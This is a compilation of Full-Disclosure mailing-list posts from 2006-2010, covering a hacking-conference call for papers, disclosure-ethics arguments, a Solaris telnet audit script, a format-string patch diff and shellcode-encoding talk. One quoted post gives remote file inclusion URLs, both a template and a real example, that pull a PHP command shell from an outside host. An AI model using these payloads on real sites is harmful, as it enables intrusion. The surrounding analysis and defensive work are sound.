[Full-disclosure] Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP http://hackitoergosum.org Hackito Ergo Sum conference will be held from April 8th to 10th 2010 in Paris, France. It is part of the series of conference Hacker Space Fest taking place since 2008 in France and all over Europe. HES2010 will focus on hardcore computer security, insecurity, vulnerability analysis, reverse engineering, research and hacking. INTRO The goal of this conference is to promote security research, broaden public awareness and create an open forum so that communication between the researcher, the security industry, the experts and the public can happen. A recent decision of justice in France has convicted a security researcher for disclosing vulnerabilities and exploits. These laws (similar to the one in Germany), descending from USA's DMCA law, are orienting freedom of research and knowledge into a situation where illegal knowledge can happen, restricted to the only ones blessed by governmental silent approval and military. Scientific research and public information cannot be made into another monopoly of state, where some can study and publish and some others cannot. Such approach just show how misinformed some politics are and how little understanding they get of the struggle they are acting in. Not understanding that the best way to improve security is to attack it shows the lack of maturity of some stakeholder by being cut out of independent information sources. This is where our ethics and responsibility is to say No, we have a right for free information and true independence in research, and this responsibility is the one of anybody, not just the responsibility of academically blessed scientists. This conference will try to take in account all voices in order to reach a balanced position regarding research and security, inviting businesses, governmental actors, researchers, professionals and general public to share concerns, approaches and interests during. During three days, research conferences, solutions presentations, panels and debates will aim at finding synthetic and balanced solutions to the current situation. CONTENT Research Track: We are expecting submissions in english or french, english preferred. The format will be 45 mn presentation + 10mn QA. For the research track, preference will be given for offensive, innovative and highly technical proposals covering (but not restricted to) the topics below: Attacking Software * Vulnerability discovery (and automating it!) * Non-x86 exploitation * Fuzzing with SMT and its limits * New classes of software vulnerabilities and new methods to detect software bugs (source or binary based) * Reverse Engineering tools and techniques * Static analysis (source or binary, Lattices to blind analysis, new languages and targets strongly encouraged) * Unpacking * Current exploitation on Gnu/Linux WITH GRsecurity / SElinux / OpenWall / SSP and other current protection methods * Kernel land exploits (new architectures or remote only) * New advances in Attack frameworks and automation Attacking Infrastructures * Exotic Network Attacks * Telecom (from VoIP to SS7 to GSM 3G RF hacks) * Financial and Banking institutions * SCADA and the industrial world, applied. * Governmental firewall and their limits (Australia, French's HADOPI, China, Iran, Danemark, Germany, ...) * Satellites, Military, Intelligence data collection backbones (I hacked Echelon and I would like to share) * Non-IP (SNA, ISO, make us dream...) * Red-light and other public utilities control networks * M2M Attacking Hardware * Hardware reverse engineering (and exploitation + backdooring) * Femto-cell hacking (3G, LTE, ...) * Microchip grinding, opening, imaging and reverse engineering * BIOS and otherwise low-level exploitation vectors * Real-world SMM usage! We know it's vulnerable, now let's do something * WiFi drivers and System on Chip (SoC) overflow, exploitation and backdooring. * Gnu Radio hacking applied to new domains * Toll-booth and fast-lane payment systems Attacking Crypto * Practical crypto attacks from the hackers perspective (RCE, bruteforce, ...) * SAT-solver applied to cryptanalysis * Algorithm strength modeling and evaluation metrics * Hashing functions pre-image attacks * Crypto where you wouldn't think there is We highly encourage any other presentation topic that we may not even imagine. Required informations: * Presenter's name * Bio * Presentation Title * Description * Demo? * Needs: Internet? Others? * Company (name) or Independent? * Address * Phone * Email Send your submission to: hes2010-cfp __AT__ lists.hackitoergosum.org Business Society Track: Format: 20 minutes slots to present a tool, an innovative product, a solution (commercial, open source, free); a customer experience or open research domain; a society issue or a subject of public interest. Demos are mandatory for tool, product or solutions presentations. Pure-marketing
Re: [Full-disclosure] The real motivations of vulnerability disclosure
Hello FD readers, I don't usually answer non technical posts, but I feel like explaining why I believe the ideas expressed by Mr Frogs and similar underground orthodoxes are clueless. Mr Frog : To summarize your thesis : ppl disclose vulnerabilities for fame profit. That's not how real hackers used to be. Ok, let's analyze those statements a bit deeper : First, let's establish the truth about fame : Fame ? What fame ? Does your mother know who Michal Zalewski is ? Of course not. When you first decided to be a computer enthusiast, you also decided you would spend your life behind a computer an none would ever give a damn. You're also mentioning people having wikipedia entries or belonging to crews ( the so called research communities) : you're surely missing people writing bullshit on blogs and posting links to their miserable thoughts on public mailing lists... Additionally, I especially enjoy the intellectually challenging relation between your first sentence when a vulnerability in a major site is discovered people freak out... and your conclusion : These types of people tend to hang around 'xss' hacking sites where they can learn the masterful art of finding an issue any 5 year old could find with less than 15 minutes of training.. In a nutshell, that's the good old manichean (did I say Protestant ?) schema : the good (being the non disclosure folks from your blog post) agains the bad (being the fame seekers) guys. In the same veine, let me quote http://www.phrack.org/issues.html?issue=64id=4#article : But it is the reason not to write a technical article. The purpose of this article is to launch an SOS. An SOS to the scene, to everyone, to all the hackers in the world. To make all the next releases of Phrack better than ever before. And for this I don't need a technical article. I need what I would call Spirit. (follows an apology of pre-internet hacking mythology) Those kinds of thoughts, almost as inept as they are widespread. To you all, anachronic purists of the so called underground : go to hell. If there ever was a spirit of the underground, it was the belief that individuals can, on their very own, do better than what engineers do on the industry (which is in fact absolutly understandable if you consider that companies have budget constraints, deadlines and limited knowledge). I don't see any opposition between this and vulnerability disclosure. What you do with a vulnerability you have found is unrealevant. Now, if the whole dilema is about people being at the same time security enthousiasts on their own, and social beings needing to work in a way or an other to feed their families, let me tell you a big secret : everyone on the underground, starting with Adm, teso, phenoelite, phrack, (pasting from phrack's article) 2600,Phrack, PacketStorm, Phreak.org, Uniformed, PTP,Netric,Felinemenace, Hackcanada,Toxyn, phc, w00w00, devhell, cDc, l0pht, el8, gobbles, synergy, blacksecurity, u-name-it people and members of every other reasonably skilled security group I have never heard of are working for security related companies. Maybe it wasn't the case in the 80's. But today, of you want to be able to understand a bit what's going on, hacking is a full time job. Their is no dichotomy between hacking on your own and selling your skills to a company. So please, stop pointing the finger at each person trying to share a bit what they have discovered. my 0.02$ Regards, -- endrazine-//Garage made hacker Security Engineer at the same time. PS: The members of the above cited groups are asked not to flame me with I'am no industry guy posts : I know you are ;) And thanks for sharing your work : I couldn't get half of the skills I have today without your disclosures. On 10/3/07, Mr Frog [EMAIL PROTECTED] wrote: For the past 10 years when a vulnerability in a major site is discovered people freak out. I'm not debating the importance of certain site vulnerabilities such as those exposing personal or account information. I'm going to talk about one of those things people think, but don't speak publicly about which involves the intentions of those vulnerability disclosure folks. I'm going to break down these types of people and some people in the 'industry' are going to laugh and others possibly be offended. If you have a problem with this then we can meet in an alley for warfare, but please don't bring salt as it burns. http://hackingfrog.blogspot.com/2007/10/o-o-omg-frog.html - Froggie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] firefox 2.0.0.2 crash
Mihai Dontu a écrit : On Friday 09 March 2007 20:31, Tõnu Samuel wrote: Can be dupe but in fast browsing over topics I did not discovered this exploit: http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif Makes gimp 2.2.12 segfault. [EMAIL PROTECTED] ~/firefox.crash $ gimp ./firefox-crash-save-session-before-clicking.gif GIF: too much input data, ignoring extra... GIF: bogus character 0x00, ignoring. GIF: too much input data, ignoring extra... GIF: bogus character 0x00, ignoring. GIF: bogus character 0x23, ignoring. GIF: bogus character 0xf9, ignoring. GIF: bogus character 0x04, ignoring. GIF: bogus character 0x05, ignoring. GIF: bogus character 0x0a, ignoring. GIF: bogus character 0x00, ignoring. GIF: bogus character 0x0e, ignoring. GIF: bogus character 0x00, ignoring. (gifload:8687): LibGimp-CRITICAL **: gimp_drawable_get: assertion `width 0 height 0 bpp 0' failed /usr/lib/gimp/2.0/plug-ins/gifload: fatal error: Erreur de segmentation [EMAIL PROTECTED] ~/firefox.crash $ Cheers, endrazine ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many on yournetwork?
Hi, you dont want to ask nmap to determine the OS based on port 23 scan only. so, s/p23// in the second nmap call. hence: #!/bin/bash # solaris-telnetd-audit.sh IPSFILE=./ips.lst; # file containing IPs to scan MESSAGE=possible-Solaris-telnet-server-found; EMAIL=[EMAIL PROTECTED]; for IP in `cat $IPSFILE` do echo Trying $IP ...; if nmap -P0 -n -p23 -sS $IP | grep -i open /dev/null then if nmap -P0 -n -sV $IP | grep -ie 'SunOS' -ie 'Solaris' /dev/null then echo $MESSAGE - $IP; echo $IP $0.results; fi fi done cat $0.results | mail -s $MESSAGE $EMAIL my 0.02$ Cheers, endrazine- pagvac a écrit : On 2/17/07, Marcin Antkiewicz [EMAIL PROTECTED] wrote: On Sat, 17 Feb 2007, pagvac wrote: The following script might also help find Solaris telnet servers on your network. [...] for IP in `cat $IPSFILE` do echo Trying $IP ...; if nmap -P0 -n -p23 -sS $IP | grep -i open /dev/null then if nmap -P0 -n -p23 -sV $IP | grep -ie 'SunOS' -ie 'Solaris' then echo $MESSAGE on $IP; echo $IP $0.results; echo $IP | mail -s $MESSAGE $EMAIL fi fi done The output would be too noisy on a large network. Few weeks ago I ran Noisy only on the screen/email output. However, notice that *only* the IP addresses found running Solaris telnet servers are written to the results file ($0.results). Perhaps we should change it to the following so that only one email is sent with all the IP addresses found: #!/bin/bash # solaris-telnetd-audit.sh IPSFILE=./ips.lst; # file containing IPs to scan MESSAGE=possible-Solaris-telnet-server-found; EMAIL=[EMAIL PROTECTED]; for IP in `cat $IPSFILE` do echo Trying $IP ...; if nmap -P0 -n -p23 -sS $IP | grep -i open /dev/null then if nmap -P0 -n -p23 -sV $IP | grep -ie 'SunOS' -ie 'Solaris' /dev/null then echo $MESSAGE - $IP; echo $IP $0.results; fi fi done cat $0.results | mail -s $MESSAGE $EMAIL P.S.: I personally like using genip [http://www.bindshell.net/tools/genip] for generating lists of IP addresses. something that would go like this: ( echo Sun bxes with telnet; \ nmap -n -P0 -iL list -p 23 -O -oG - |\ grep -Ei 'Host.+open.+(Solaris|SunOS)' | \ cut -d ' ' -f 2 \ ) | mail -s Check those [EMAIL PROTECTED] -- Marcin Antkiewicz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Fwd: Re: [ GLSA 200701-18 ] xine-ui: Format string vulnerabilities]
Hi list,
I couldn't get a confirmation from the author of this post.
GLSAs are very often the best source of detailed information
on a given vulnerability imho ; at least, They provide indications
on the type of vulnerability and the afected function name.
Too bad they're inacurate :/
Regards,
endrazine-
---BeginMessage---
Hello Raphael,
I have an issue with this Glsa (wich is a really usefull service
between, thx) :
I think the affected syscall is xitk_window_dialog_error rather at line
128,231,357 in /src/xitk/errors.c
the bad thing is that errors_create_window exists but wasn't modified
at all...
see below...
$ diff ./xine-ui-0.99.4/src/xitk/errors.c
../../xine-ui-0.99.5_pre20060716/work/xine-ui-0.99.5_pre20060716/src/xitk/errors.c
20c20
* $Id: errors.c,v 1.32 2005/02/07 18:16:28 miguelfreitas Exp $
---
* $Id: errors.c,v 1.34 2006/07/15 08:46:50 dgp85 Exp $
71c71
message);
---
%s, message);
113c113
if(gGui-stdctl_enable) {
---
if(gGui-stdctl_enable || !gGui-display) {
128c128
xw = xitk_window_dialog_error(gGui-imlib_data, buf2);
---
xw = xitk_window_dialog_error(gGui-imlib_data, %s, buf2);
231c231
xw = xitk_window_dialog_info(gGui-imlib_data, buf2);
---
xw = xitk_window_dialog_info(gGui-imlib_data, %s, buf2);
357c357
message);
---
%s, message);
Regards,
endrazine-
Raphael Marichez a écrit :
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: xine-ui: Format string vulnerabilities
Date: January 23, 2007
Bugs: #161558
ID: 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
xine-ui improperly handles format strings, possibly allowing for the
execution of arbitrary code.
Background
==
xine-ui is a skin-based user interface for xine. xine is a free
multimedia player. It plays CDs, DVDs, and VCDs, and can also decode
other common multimedia formats.
Affected packages
=
---
Package / Vulnerable /Unaffected
---
1 xine-ui 0.99.5_pre20060716= 0.99.5_pre20060716
Description
===
Due to the improper handling and use of format strings, the
errors_create_window() function in errors.c does not safely write data
to memory.
Impact
==
An attacker could entice a user to open a specially crafted media file
with xine-ui, and possibly execute arbitrary code.
Workaround
==
There is no known workaround at this time.
Resolution
==
All xine-ui users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
=media-video/xine-ui-0.99.5_pre20060716
References
==
[ 1 ] CVE-2007-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254
Availability
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200701-18.xml
Concerns?
=
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
===
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
---End Message---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Fwd: Re: [ GLSA 200701-18 ] xine-ui: Format string vulnerabilities]
Hello,
Ok, apparently, the primary source of information is the Cert, since :
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0254
hrm, I still think the vunerability has nothing to do with
errors_create_window thoo.
Cheers,
endrazine-
endrazine a écrit :
Hi list,
I couldn't get a confirmation from the author of this post.
GLSAs are very often the best source of detailed information
on a given vulnerability imho ; at least, They provide indications
on the type of vulnerability and the afected function name.
Too bad they're inacurate :/
Regards,
endrazine-
Sujet:
Re: [Full-disclosure] [ GLSA 200701-18 ] xine-ui: Format string
vulnerabilities
Expéditeur:
endrazine [EMAIL PROTECTED]
Date:
Wed, 24 Jan 2007 08:08:51 +0100
Destinataire:
Raphael Marichez [EMAIL PROTECTED]
Destinataire:
Raphael Marichez [EMAIL PROTECTED]
Hello Raphael,
I have an issue with this Glsa (wich is a really usefull service
between, thx) :
I think the affected syscall is xitk_window_dialog_error rather at
line 128,231,357 in /src/xitk/errors.c
the bad thing is that errors_create_window exists but wasn't
modified at all...
see below...
$ diff ./xine-ui-0.99.4/src/xitk/errors.c
../../xine-ui-0.99.5_pre20060716/work/xine-ui-0.99.5_pre20060716/src/xitk/errors.c
20c20
* $Id: errors.c,v 1.32 2005/02/07 18:16:28 miguelfreitas Exp $
---
* $Id: errors.c,v 1.34 2006/07/15 08:46:50 dgp85 Exp $
71c71
message);
---
%s, message);
113c113
if(gGui-stdctl_enable) {
---
if(gGui-stdctl_enable || !gGui-display) {
128c128
xw = xitk_window_dialog_error(gGui-imlib_data, buf2);
---
xw = xitk_window_dialog_error(gGui-imlib_data, %s, buf2);
231c231
xw = xitk_window_dialog_info(gGui-imlib_data, buf2);
---
xw = xitk_window_dialog_info(gGui-imlib_data, %s, buf2);
357c357
message);
---
%s, message);
Regards,
endrazine-
Raphael Marichez a écrit :
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: xine-ui: Format string vulnerabilities
Date: January 23, 2007
Bugs: #161558
ID: 200701-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
xine-ui improperly handles format strings, possibly allowing for the
execution of arbitrary code.
Background
==
xine-ui is a skin-based user interface for xine. xine is a free
multimedia player. It plays CDs, DVDs, and VCDs, and can also decode
other common multimedia formats.
Affected packages
=
---
Package / Vulnerable /Unaffected
---
1 xine-ui 0.99.5_pre20060716= 0.99.5_pre20060716
Description
===
Due to the improper handling and use of format strings, the
errors_create_window() function in errors.c does not safely write data
to memory.
Impact
==
An attacker could entice a user to open a specially crafted media file
with xine-ui, and possibly execute arbitrary code.
Workaround
==
There is no known workaround at this time.
Resolution
==
All xine-ui users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
=media-video/xine-ui-0.99.5_pre20060716
References
==
[ 1 ] CVE-2007-0254
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0254
Availability
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200701-18.xml
Concerns?
=
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
===
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Re: [Full-disclosure] Wikipedia and Pedophilia
Could you please please move to alt.politics.personal.statements.on.drugs ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure
Hi Vladis, Hi dear list, [EMAIL PROTECTED] a écrit : It's a pretty easy proof actually. If your password input routine allows more different passwords than there are possible hashes, you *will* have collisions. For instance, if you use a 64-bit hash, and reasonable-length passwords, you can create more than 2**64 of them, and 2 *have* to collide. Agreed, good sense helps in some cases ;) If you're using anything resembling a sane hash (such as MD5 or similar), what happens is that you basically ignore the hash collisions - because rather than 1234, your colliding password/phrase is probably a 32-byte or so string, which is likely not even enterable at the keyboard (it ends up being A # ctl-b 9 e alt-control-meta-$ etcetc - of the 32, likely only 10 or so of the characters are from the 96-char printable ASCII set, and there's a good chance that at least several of the bytes are ones you can't enter from the keyboard at all) Here again, I agree. Now, if one needs to exhaustively try every possible 32b hashes with the largest possible charset (or even bigger hashes with a smaller - like those alphanumerical keys you just mentionned), to break a password hash, the it's not a *BIG* security issue like mentionned earlier imho. Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure
typos : endrazine a écrit : Here again, I agree. Now, if one needs to exhaustively try every possible 32b hashes with the largest possible charset (or even bigger hashes with a smaller - like those alphanumerical keys you just mentionned), to break a password hash, the it's not a *BIG* security issue like mentionned earlier imho. s/hashes/passwords/ indeed Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure
Hi dear list, wac a écrit : On 1/5/07, [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: On Fri, 05 Jan 2007 15:34:49 EST, T Biehn said: This isn't a password disclosure, it's a leak of password information. It's a password hash, you super hacker. yes that's correct but don't forget that hashes can collide it could be the case that: can ? could ? might ? Do you have any mathematical prouve or are you just guessing ? xhash($Up3$tr0n9 # [EMAIL PROTECTED]) == xhash(1234) and you don't even need the original strong one ;) what hashing algorithm is being use ? Is a collision realistic ? How much time would it take to actually break a given hash ? so strong password is not a countermesure to that I beleive that is a BIG security hole At least, the hash was probably not meant to be leaked ;) Now, if you don't answer the above questions by can, weak, very, 1 day or so, hence, the word BIG is a bit exagereted imho... Regards, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CCC: Monochrom, hackers and art (plus other videos and presentations)
Hi dear list, usual politeness Happy new year, etc... ;) /usual politness I have apparently not attended any talk (besides those on RFID) Gadi did... Technically speaking, the best talks I have seen (security wise) were : * Unusual bugs by Ilja : http://events.ccc.de/congress/2006/Fahrplan/events/1456.en.html * An amazing one man show by Dan Kaminsky ;) : http://events.ccc.de/congress/2006/Fahrplan/events/1713.en.html * the 3 RFID hacking talks on day 2 : http://events.ccc.de/congress/2006/Fahrplan/day_2.en.html The talk by Melanie Rieback was very instructive in spite of some very discutable commercial propaganda (imho). Joanna's talk was also refreshing for non technical reasons ;p Regards, endrazine- PS: Tonnerre's lecture was also interesting for anyone involved with open source development. PPS: Thx to ppl who spent time socializing a bit, I had a great time sharing ideas with you :) Gadi Evron a écrit : CCC was amazing! I am definitely going next year again. For more videos and presentations suggestions, skip to the link below. One of the greatest surprises for me at 23C3 was my personal introduction to Monochrom ( http://monochrom.at/ , http://en.wikipedia.org/wiki/Monochrom ), a group of hacker artists from Austria. I know Jake Applebaum.. but I had no idea about the Austrian group, or how great they are. In very simple terms they are artists, very contemporary and very very scene-connected. Life hacking, real hacking and any type of hacking, these guys are just l33t. We need to get them a stage one evening at defcon so they can play for us. As a quick introduction to them, sing along with their RFID song (special for 23C3). I know I did. (although I couldn't follow their German songs, Danke sounded like a lot of fun - yes, I saw you singing Fukami!) http://youtube.com/watch?v=Ywg53D8_iVw For their lecture at 23C3, which is very cool and presents a lot of very interesting art projects heavily relating to hacking (not work safe! Porn! Could be considered very offensive! PG18, etc.) download the wmv: ftp://ftp.c3d2.de/congress/23c3/monochrom-t4s3.wmv Some of the projects they discuss include porn, indeed, but others are more interesting. They created an entirely fictional artist (Georg Paul Thomann - http://en.wikipedia.org/wiki/Georg_Paul_Thomann ) and had him represent Austria in an International art show (and save Taiwan when China wanted them out of the show). They showed (both by using 50 real Euros and with a mathematical calculation) how many times it would take to blow the several Trillian Euros in circulation by going to a bank and exchanging to USD and Euro again and again, etc. Cool people! RFID!! I cover CCC extensively on the SecuriTeam blogs, if anyone is interested in other talks of note: CCC report: day 0 http://blogs.securiteam.com/index.php/archives/773 23C3 (CCC) lectures on Google Video http://blogs.securiteam.com/index.php/archives/777 More CCC Presentations and Videos http://blogs.securiteam.com/index.php/archives/779 CCC: Router and Infrastructure Hacking http://blogs.securiteam.com/index.php/archives/781 CCC: traffic analysis http://blogs.securiteam.com/index.php/archives/782 CCC: Monochrom, hackers and art http://blogs.securiteam.com/index.php/archives/783 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with event logs (semi-offtopic)
Heya lists 3APA3A, 3APA3A a écrit : Dear full-disclosure@lists.grok.org.uk, There is interesting thing with event logging on Windows. The only security aspect of it is event log record tampering and performance degradation, but it may become sensitive is some 3rd party software is used for automated event log analysis. The problem is a kind of Format string vulnerability where user-supplied input is used for event log record. For ReportEvent() function %1, %2, etc have a special meaning and are replaced with corresponding string from lpStrings. It looks more like a variable replacement (like $0 $1 ... in bash shell) than a format string issue to me. And it seems indeed to be a relevant information disclosure bug. Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Tyop? a écrit : Flashing the bios will erase all data. It's a feature, not a bug. Bios passwords are stored on the CMOS, not the Rom itself, so no, it doesn't have to be. On the other side, if you can flash your ROM, you have iopl(3) hence root privileges or at least enougth privileges to get those passwors back (1). So that's really no bid deal. Regards, endrazine- (1) http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt side note: I think you both know nothing. Sadly, giving non technical _opinions_ has become the main source of postings on this list. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
endrazine a écrit : Just so you know : most Bios settings are stored on the Cmos, so if you can flash the Rom, you have ioperms at the very least on Cmos i/o ports, so you can reset the whole Cmos anyway. endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymizing RFI Attacks Through Google
Hi Gadi, I beg your pardon, but either I missed the purpose of this post, or you discovered hot water : this process of attack is a mere waste of time if one only reaches anonymity : in order to give google this new url to crawl, you'd have to either create a web page that points to this very page, or enter the url in the google database directly using their form. None of those two options are safer than attacking the website directly (google might vey well log your actions), so what's the point ? Also, most features in the web (like free emails, online scanning, pinging, lookup, etc., most applets allowing you to use irc, ftp or other services...) can be used to Anonymise (or at least proxify) attacks. So why focusing on google and search engines specifically ? To be honest, my biggest issue with this post is its lack of technicallity : no offense, but I can hardly see anything that isn't public knowlege in this post. Regards, endrazine- Gadi Evron a écrit : Noam Rathaus on using Google to anonymize attacks on websites: http://blogs.securiteam.com/index.php/archives/746 Anonymizing RFI Attacks Through Google noam - November 23, 2006 on 12:03 pm Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of Google hacking, although that is how most of the sites vulnerable to RFI attacks are found). By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler. PoC - A malicious web page is constructed by an attacker, containing a URL built like so: 1. Third party site URI to attack. 2. File inclusion exploit. 3. Second URI containing a malicious PHP shell. Example URL: http://victim-site/RFI-exploit?http://URI-with-malicious-code.php Google will harvest this URL, visit the site using its crawler and index it. Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It's a feature, not a bug. This is currently exploited in the wild. For example, try searching Google for: inurl:cmd.gif And note, as an example: www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd Which is no longer vulnerable. Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites? Notes: 1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders. 2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can?t be used in a similar fashion. 3. The feature might also be used to anonymize communication, as a covert channel. Noam Rathaus. (with thanks to Gadi Evron and Lev Toger) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] *BSD banner INT overflow vulnerability
Tyop? a écrit : $ ls -l /usr/bin/banner -r-xr-xr-x 1 root wheel 9576 Jul 5 2005 /usr/bin/banner $ pfiuuu.. I'm safe. Thx a lot. F34r da banner H4x0r. Rofl : you summarized it all : there's a bug, not a security issue thoo. Cheers, endrazine- PS : I suggest posting such bugs with '[XSS]' in the subject, to ease filtering ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to covert shellcode to HTML style ?
take 2: had some issues in sending this one Hi list, Knud Erik Højgaard a écrit : On 11/9/06, 李继辉 [EMAIL PROTECTED] wrote: For example ,I find This exploit: http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your upcoming botnet. Nod, encoding the shellcode into an acceptable charset is something that has been done for ages now (see Philippe Biondi's shellforge - did you fix the final ret ? ;) - for instance, or old phrack issues [2] [3]). Let's focus a bit on x86: What about the return address if you have a simple buffer overflow for instance ? I just had a few tests, and you can't simply urlencode the return address assuming the webserver/client will decode it automatically for you (it won't). Since adresses in the stack are tipycally around 0xbf?? in memory, this return address _will_ contain non printable characters (at least the \bf one,), even if the overflow is big enougth so that you can get rid of the other ones by jumping at an appropriate address in the stack... I have no simple solution atm, but forging valid arguments for the current syscall that will eventually do something evil in the process (wich isn't something that can be done in a systematic way) and _not_ overriting the return address.. You could think of crafting arguments for previous stack frames too, but since you still can't forge return addresses for those, you will not be able to overwrite both local and global variables pushed on the stack... An other solution would be ret2esp [4], assuming you find : 1) a way to store your shellcode somewhere in memory, the address of your shellcode being a pure Ascii string. 2)an address in memory that will allow you to jmp %esp (or mov %esp, etc.) , that address being usable as a return address (ie: is a pure Ascii string). I doubt those conditions will ever be met.. Things should be quite similar on Sparc architectures imho since afaik, the return address isn't pushed on the stack, so the problem is very close to this one. In a nutshell : Erik, I disagree with you, I think it's a valid, non trivial, question :) Regards, endrazine- [1] http://www.secdev.org/projects/shellforge/ ---which isn't just ia32 between :) [2] http://www.phrack.org/archives/57/p57-0x18 [3] http://www.phrack.org/archives/61/p61-0x0b_Building_IA32_UnicodeProof_Shellcodes.txt [4] http://www.tty64.org/doc/expwlnxgateso1.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
